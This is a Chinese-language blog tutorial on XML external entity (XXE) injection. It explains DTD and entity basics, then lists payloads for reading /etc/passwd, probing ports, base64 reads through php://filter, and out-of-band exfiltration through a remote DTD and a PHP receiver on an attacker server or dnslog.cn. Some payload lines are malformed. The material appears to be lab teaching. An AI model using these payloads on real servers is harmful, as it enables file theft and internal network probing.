【网络安全】XXE--XML外部实体注入

最新推荐文章于 2024-08-16 17:40:16 发布
最新推荐文章于 2024-08-16 17:40:16 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: web安全 xml java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41158271/article/details/130319616
版权
XXE漏洞是由于服务端不安全地处理XML输入导致的,攻击者可以通过注入外部实体来读取敏感信息或执行恶意操作。文章介绍了XML的基础知识,如DOCTYPE、ELEMENT和#PCDATA的作用,以及内部实体和外部实体的区别。此外,还详细讲解了XXE漏洞的利用方法,包括有回显和无回显情况下的攻击策略,如利用file协议、http伪协议和DNSlog平台进行探测和信息窃取。
摘要由CSDN通过智能技术生成

XXE

XXE定义

XML外部实体注入(XML EXTERNAL ENTITY)简称XXE漏洞,概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

XML初识

菜鸟xml概念

在这里插入图片描述

初识DTD

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>

!DOCTYPE note (第二行)定义此文档是 note 类型的文档。
!ELEMENT note (第三行)定义 note 元素有四个元素:“to、from、heading,、body”
!ELEMENT to (第四行)定义 to 元素为 “#PCDATA” 类型
!ELEMENT from (第五行)定义 from 元素为 “#PCDATA” 类型
!ELEMENT heading (第六行)定义 heading 元素为 “#PCDATA” 类型
!ELEMENT body (第七行)定义 body 元素为 “#PCDATA” 类型

解答疑虑1:!DOCTYPE是干什么用的

在这里插入图片描述

疑虑2:!ELEMENT是干什么用的

在这里插入图片描述

疑虑3:#PCDATA是干什么用的

在这里插入图片描述

疑虑4:为什么元素要再次声明类型

在这里插入图片描述

内部实体外部实体的区别
内部实体
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright runoob.com">

实体可以理解为变量
writer = Donald Duck.
copyright = Copyright runoob.com


如何引用:
元素标签内+ &writer;
例子:<heading>&writer;</heading>

总结:就是在xml内部进行定义变量,就是所谓的内部实体
外部实体
<!ENTITY writer SYSTEM "http://www.runoob.com/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.runoob.com/entities.dtd">

理解为:
writer = "http://www.runoob.com/entities.dtd"
copyright = "http://www.runoob.com/entities.dtd"
SYSTEM 在引用外部实体的时候需要加SYSTEM

如何引用:
元素标签内+ &writer;
例子:<heading>&writer;</heading>

总结:外部实体就是引用外部的文件
通用实体引用
创建文件aaa.dtd
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright runoob.com">

引用方式:
<?xml version='1.1' encoding='utf-8'>
<!DOCTYPE note [
<!ELEMENT % file SYSTEM "http://www.runoob.com/aaa.dtd>"
%file;
]>
<note>

xxe漏洞利用

有回显
判断靶场是否存在回显
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer "test">
]>
<name>&writer;</name>

在这里插入图片描述

利用file协议读取敏感信息
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'file:///etc/passwd'>
]>
<name>&writer;</name>

在这里插入图片描述

win 请读取文件c:/windows/win.ini

探测端口
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM '127.0.0.1:3306'>
]>
<name>&writer;</name>
无回显
利用http伪协议读取敏感信息
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>
]>
<name>&writer;</name>

在这里插入图片描述
在这里插入图片描述

利用服务器攻击服务器漏洞获取敏感信息(待补充)
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY % file SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>
5up4ga.dnslog.cn
<!ENTITY % remove SYSTEM 'http://192.168.0.22/home/kali/test/bbb.dtd'>
%remove; 
%all;
%send;
]>
<name>&writer;</name>

攻击方服务器启动目录准备php和dtd文件

<?
$file='./test.txt';
$content=base64_decode($_GET['file']);
file_put_contents($file,$content);
echo "\n";
?>

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://本地服务ip/php文件'?file=%file;'>"
>
利用dnslog平台检测是否访问
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'http://qw1j8c.dnslog.cn'>
]>
<name>&writer;</name>


<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY % writer SYSTEM 'http://qw1j8c.dnslog.cn'>
%writer;
]>

在这里插入图片描述

边缘拼命划水的小陈
关注
专栏目录
xxe-xml外部实体注入
nigo134的博客
07-27 2995
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
利用 XML 外部实体注入
blacklordking的博客
06-21 428
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体
34-XXEXML外部实体注入
XLbb的博客
05-19 992
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
XML外部实体注入
最新发布
2201_75572825的博客
08-16 1541
比如下面这个插入了“<”符号,解析器会把它当作新元素的开始,就会产生错误,为了避免这个错误,我们可以用实体引用来替代这些特殊的字符。其中,entity-name是参数实体的名称,entity-value 是参数实体的值。在这个例子中,定义了一个名为author的内部实体,它的实际内容是John Smith,在xml文档中,通过&author进行引用,并将其替换为实际内容。而在DTD中,实体是一种可以被引用的数据类型,它可以用来代替特定的字符,字符串,符号等,从而使DTD更加灵活和易于维护。
XML 外部实体注入
2201_75370376的博客
06-22 1046
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
(十二)XML外部实体XXE注入
weixin_43047908的博客
04-16 2046
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
【burpsuite安全练兵场-服务端10】XML外部实体注入XXE注入)-9个实验(全)
wangluoanquan111的博客
01-26 1123
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
这篇文章主要讨论了CVE-2020-29436,这是一个针对Nexus Repository Manager 3的安全漏洞,该漏洞是由于XML外部实体注入XXE)引起的。Nexus Repository Manager 3是一款广泛使用的软件包仓库管理服务,它允许组织...
WEB安全XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXEXML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
Web Hacking 101 中文版 十四、XML 外部实体注入(一)
热门推荐
龙哥盟
03-25 3万+
十四、XML 外部实体注入 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 XML 外部实体XXE)漏洞涉及利用应用解析 XML 输入的方式,更具体来说,应用程序处理输入中外部实体的包含方式。为了完全理解理解如何利用,以及他的潜力。我觉得我们最好首先理解什么是 XML外部实体。元语言是用于描述其它语言的语言,这就是 XML。它在 H
xml外部实体注入XXE
songbai220
12-10 331
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
XXE--XML外部实体注入
Y22Lee的博客
04-20 273
简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。
XML外部实体注入(XXE)
web1的博客
09-08 523
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
XXEXML外部实体注入
一个普普通通的博客
04-18 919
XXE
Xxe外部实体注入XML External Entity Injection)
xuyunpeng3189的博客
01-23 1141
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
XXExml外部实体注入
今天也要加油鸭
03-13 2192
一、什么是xml 二、漏洞原理 三、攻击方式 四、危害 五、如何防御
XML外部实体注入XXE)漏洞详解
XXEXML External Entity Injection)漏洞是网络安全领域的一个重要话题,它出现在应用程序处理XML输入时未能正确限制外部实体的加载。XML是一种类似于HTML的语言,允许用户自定义标签来结构化数据。而XML External...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值